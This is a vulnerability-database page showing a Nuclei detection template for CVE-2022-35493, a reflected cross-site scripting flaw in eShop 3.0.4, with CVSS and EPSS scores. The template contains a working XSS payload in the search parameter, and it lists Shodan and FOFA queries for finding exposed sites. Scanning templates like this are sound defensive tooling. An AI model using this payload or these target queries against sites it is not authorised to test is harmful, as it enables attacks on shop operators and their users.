Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-35493
HistoryAug 09, 2022 - 7:09 p.m.

eShop 3.0.4 - Cross-Site Scripting

2022-08-0919:09:47
ProjectDiscovery
github.com
4

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

46.3%

eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.
id: CVE-2022-35493

info:
  name: eShop 3.0.4 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website.
  remediation: |
    To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35493
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35493
    cwe-id: CWE-79
    epss-score: 0.00118
    epss-percentile: 0.45934
    cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wrteam
    product: eshop_-_ecommerce_\/_store_website
    shodan-query:
      - http.html:"eShop - Multipurpose Ecommerce"
      - http.html:"eshop - multipurpose ecommerce"
    fofa-query: body="eshop - multipurpose ecommerce"
  tags: cve,cve2022,eshop,xss,wrteam

http:
  - method: GET
    path:
      - '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Search Result for \"><img src=x onerror=alert(document.domain)>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e245876360fb5c25c87f17e06acce39e053db7cb19f5a3bf3e2d9101445ac8a8022061442c0bf07222d6da43dfc5fe4e9890d5991da43f64891be21b7482c7cf32c7:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

46.3%

Related for NUCLEI:CVE-2022-35493